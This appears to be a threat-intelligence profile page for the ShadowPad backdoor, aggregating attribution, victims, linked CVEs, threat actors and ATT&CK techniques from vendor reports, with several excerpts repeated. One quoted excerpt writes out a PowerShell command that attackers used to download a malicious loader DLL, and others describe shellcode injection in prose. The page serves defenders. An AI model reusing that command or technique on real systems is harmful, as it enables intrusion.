ShadowPad is a modular Windows backdoor widely associated with Chinese cyberespionage activity and used by multiple China-aligned intrusion sets rather than a single exclusive operator. It is commonly discussed alongside PlugX as shared tooling in the Chinese espionage ecosystem and has appeared in campaigns targeting government, critical infrastructure, and law enforcement-related entities across Asia, including activity affecting India’s power sector and Pakistani police organizations. Infrastructure historically associated with ShadowPad has also been used as an attribution clue in later intrusions, although such overlap alone does not prove direct operational use in every case.
ShadowPad functions as a stealthy post-compromise access platform. Reported behavior includes maintaining encrypted configuration data and a virtual file system in the Windows Registry, reflecting its modular design and support for long-term covert operations. As a backdoor family, it is used to provide persistent remote access and flexible follow-on capability for espionage objectives. Public reporting and ATT&CK-style references support Registry-based configuration storage and maintenance as a characteristic behavior.
Victimology linked to ShadowPad spans government, foreign affairs, defense, research, and critical infrastructure environments. Recorded Future tracked ShadowPad command-and-control infrastructure within the AXIOMATICASYMPTOTE cluster and observed sustained targeting of Indian power-sector entities beginning in 2020, assessing the activity as consistent with strategic pre-positioning. Separate reporting identified ShadowPad-related activity among multiple intrusion clusters targeting Pakistani law enforcement organizations between 2024 and 2026, reinforcing its role as shared tooling across China-nexus espionage operations.
ShadowPad is best characterized as a backdoor used for covert access, persistence, and post-exploitation in long-running intelligence collection campaigns. Because it is shared among several threat clusters, malware presence alone is insufficient for precise actor attribution without supporting infrastructure, victimology, or operational context.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
19 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
In May 2024, CVE-2024-24919, an information disclosure vulnerability in Check Point Quantum Security Gateways was exploited in the wild and tied to NailaoLocker ransomware (distributed via ShadowPad and PlugX backdoors, as documented by Orange Cyberdefense CERT).
Once access was established, SHADOW-EARTH-053 deployed ShadowPad, a modular malware family historically associated with multiple China-aligned intrusion sets, including APT41. The group relied heavily on DLL sideloading techniques involving signed legitimate executables.
Once access was established, SHADOW-EARTH-053 deployed ShadowPad, a modular malware family historically associated with multiple China-aligned intrusion sets, including APT41. The group relied heavily on DLL sideloading techniques involving signed legitimate executables.
Once access was established, SHADOW-EARTH-053 deployed ShadowPad, a modular malware family historically associated with multiple China-aligned intrusion sets, including APT41. The group relied heavily on DLL sideloading techniques involving signed legitimate executables.
Once access was established, SHADOW-EARTH-053 deployed ShadowPad, a modular malware family historically associated with multiple China-aligned intrusion sets, including APT41. The group relied heavily on DLL sideloading techniques involving signed legitimate executables.
ShadowPad is a modular remote access Trojan (RAT) that is closely associated with China-based APT groups. Because of its modular nature, ShadowPad can be continuously updated with new functionalities.
Among our finds on the server were utilities for lateral movement... The server had the following utilities: Utilities to check for and exploit vulnerability MS17-010... The hackers tweaked the functionality of the MS17-010 utility by adding the ability to check an entire subnet.
In their latest campaign, the actor leverages one of the latest WinRAR vulnerabilities that will ultimately lead to running shellcode... Rule names: EE_Loader EE_Dropper WinRAR_ADS_Traversal References / Resources: WinRAR CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-8088
The malware payloads seen in campaigns investigated by Microsoft Defender vary from remote access trojans (RATs) like VShell and EtherRAT, the SNOWLIGHT memory-based malware downloader that enabled attackers to deploy more payloads to target environments, ShadowPAD, and XMRig cryptominers. | CVE-2025-55182 (also referred to as React2Shell and includes CVE-2025-66478, which was merged into it) is a critical pre-authentication remote code execution (RCE) vulnerability affecting React Server Components, Next.js, and related frameworks.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a flaw in TrueConf Client, tracked as CVE-2026-3502 (CVSS score of 7.8), to its Known Exploited Vulnerabilities (KEV) catalog. CVE-2026-3502 is a flaw in TrueConf Client that allows it to download and install updates without verifying them. Attackers who can tamper with the update source can deliver malicious files, leading to arbitrary code execution on the system.
NetSarang Xmanager Enterprise 5.0 Build 1232, Xmanager 5.0 Build 1045, Xshell 5.0 Build 1322, Xftp 5.0 Build 1218, and Xlpd 5.0 Build 1220 contain a malicious nssock2.dll that implements a multi-stage, DNS-based backdoor. | References include https://securelist.com/shadowpad-in-corporate-networks/81432/ and a Kaspersky press release about 'ShadowPad attackers' hiding a backdoor in software used by hundreds of large companies worldwide. The description states the malicious nssock2.dll implements a multi-stage, DNS-based backdoor.
They also took advantage of specific software weaknesses, such as CVE-2024-8963 and CVE-2024-8190, sometimes even exploiting them before these vulnerabilities were publicly disclosed. | A key piece of malicious software was ShadowPad, described as a “closed-source modular backdoor platform” often used by these Chinese-linked groups to spy and gain remote access.
They also took advantage of specific software weaknesses, such as CVE-2024-8963 and CVE-2024-8190, sometimes even exploiting them before these vulnerabilities were publicly disclosed. | A key piece of malicious software was ShadowPad, described as a “closed-source modular backdoor platform” often used by these Chinese-linked groups to spy and gain remote access.
“We also discovered that APT41 created a tailored loader to inject a proof-of-concept for CVE-2018-0824 directly into memory, utilizing a remote code execution vulnerability to achieve local privilege escalation.” / “During the compromise the threat actor attempts to exploit CVE-2018-0824, with a tool called UnmarshalPwn …”
...эксплуатации цепочки уязвимостей ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).
...эксплуатации цепочки уязвимостей ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).
...источником их заражения оказался почтовый сервер Exchange, который оказался скомпрометированным еще летом 2024 года с помощью эксплуатации цепочки уязвимостей ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).
...ShadowPad Malware Actively Exploits WSUS Vulnerability... exploiting CVE-2025-59287 for initial access...
...exploited a public-facing Citrix NetScaler Gateway appliance, likely CVE-2023-3519, for initial access and deployed SnappyBee (also known as Deed RAT)... CVE-2023-3519 is a critical remote code execution (RCE) vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway appliances.
30 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
From mid-2020 onwards, Recorded Future’s midpoint collection revealed a steep rise in the use of infrastructure tracked as AXIOMATICASYMPTOTE, which encompasses ShadowPad command and control (C2) servers, to target a large swathe of India’s power sector.
From mid-2020 onwards, Recorded Future’s midpoint collection revealed a steep rise in the use of infrastructure tracked as AXIOMATICASYMPTOTE, which encompasses ShadowPad command and control (C2) servers, to target a large swathe of India’s power sector.
From mid-2020 onwards, Recorded Future’s midpoint collection revealed a steep rise in the use of infrastructure tracked as AXIOMATICASYMPTOTE, which encompasses ShadowPad command and control (C2) servers, to target a large swathe of India’s power sector.
Their toolkit includes ShadowPad, Spyder, Cobalt Strike, FunnySwitch, and the BIOPASS RAT, and expanding SprySOCKS to Windows clearly shows continued investment in offensive capability.
Operators used implants – such as ShadowPad, SodaMaster, and Spyder – that are common or exclusive to China-aligned threat actors.
This campaign is also the first documented time FamousSparrow used ShadowPad, a privately sold backdoor... The final payloads were SparrowDoor and ShadowPad.
33 distinct techniques documented for this family, organized by ATT&CK tactic.
Upon execution, some of the payloads will achieve persistence by either creating a scheduled task or a service.
Backdoors shared among Chinese groups, including PlugX and ShadowPad, anchored the China-nexus assessments
At Victim D, the loader was downloaded using the following PowerShell command: powershell (new-object System.Net.WebClient).DownloadFile("http://<victim’s_web_server_IP_address>/Images/menu/log.dll";"c:\users\public\log.dll")
At Victim D, the attackers gained access to an admin console and used it to deploy implants on other machines in the local network.
This functionality is achieved by utilizing the Windows native functions NtAllocateVirtualMemory and NtCreateThreadEx... The sample will allocate an RWX-protected memory region using the VirtualAlloc Windows API, then write the shellcode to the memory region and pass execution to it.
Upon execution, some of the payloads will achieve persistence by either creating a scheduled task or a service.
During the 2015 Ukraine Electric Power Attack, Sandworm Team modified in-registry Internet settings to lower internet security before launching rundll32.exe ... AADInternals can modify registry keys ... ADVSTORESHELL is capable of setting and deleting Registry values ... [many additional examples].
Upon execution, some of the payloads will achieve persistence by either creating a scheduled task or a service.
Another command, ID 0x43, is particularly noteworthy as it allows the attacker to execute shellcode in the memory of the same process... using NtAllocateVirtualMemory and NtCreateThreadEx... Once log.dll is loaded, it will spawn Microsoft Windows Media Player (wmplayer.exe) and dllhost.exe, injecting into them.
DOORME XOR-encrypts strings to evade detection... The malware employs a technique that can cause disassemblers to incorrectly split functions... The malware in question also employs a technique known as Control Flow Obfuscation... Dynamic import table resolution... log.dll incorporates a code-scattering obfuscation technique to frustrate static analysis.
ScatterBrain is a sophisticated obfuscating compiler that integrates multiple operational modes and protection components to significantly complicate the analysis of the binaries it generates.
DOORME first resolves the address of LoadLibraryA and GetProcAddress Windows API by parsing the kernel32.dll module export table... The sample uses the common Ldr crawling technique to find the address of kernel32.dll... It uses GetProcAddress to resolve imports as needed.
Selective or Full Control Flow Graph (CFG) Obfuscation: This technique restructures the program's control flow, making it very difficult to analyze and create detection rules for.
The researchers also found malicious files disguised as software updates planted directly on Balochistan Police’s public Complaint Management System.
Another command, ID 0x43, is particularly noteworthy as it allows the attacker to execute shellcode in the memory of the same process... using NtAllocateVirtualMemory and NtCreateThreadEx... Once log.dll is loaded, it will spawn Microsoft Windows Media Player (wmplayer.exe) and dllhost.exe, injecting into them.
Finally, the decrypted payload is injected into a wmplayer.exe process (Windows Media Player).
The content repeatedly describes malware and threat actors decoding, decrypting, deobfuscating, or unpacking payloads, strings, configuration data, commands, and C2 responses prior to execution or use.
The REF2924 intrusion set, using SIESTAGRAPH, DOORME, SHADOWPAD, and the system binary proxy execution technique (among others) represents an attack group...
During the 2015 Ukraine Electric Power Attack, Sandworm Team modified in-registry Internet settings to lower internet security before launching rundll32.exe ... AADInternals can modify registry keys ... ADVSTORESHELL is capable of setting and deleting Registry values ... [many additional examples].
The content repeatedly describes malware and threat actors using commands and APIs such as ipconfig /all, ifconfig, arp -a, route print, nbtstat, netsh, GetAdaptersInfo, and GetIpNetTable to gather IP addresses, MAC addresses, DNS, DHCP, gateways, routing tables, ARP cache, proxy settings, domains, and network adapter/interface details.
The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking whether the current user is an administrator, enumerating user sessions, and gathering account details from compromised hosts.
The content is a long ATT&CK-style listing of malware and threat actors that collect host details such as OS version, hostname, architecture, CPU, memory, BIOS, language, and other basic system characteristics; examples include use of commands like systeminfo, ver, uname, sw_vers, and WMI queries.
Its analysis of command-and-control netflow data revealed four tooling clusters converging on this victim class: PlugX, ShadowPad, Cobalt Strike, and Remcos.
225 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
200 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Mentioned as historically associated with the server infrastructure used in the operation, contributing to attribution assessment, but not described as the primary malware used in this intrusion.
A known backdoor/platform referenced as previously hosted on the same staging server used by the operator. It is infrastructure-related context, not the main subject of the article.
Referenced only as historical context indicating the server previously hosted a ShadowPad controller; the report does not tie ShadowPad directly to the observed intrusion.
Previously associated backdoor/controller history on the staging server infrastructure used in the operation.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.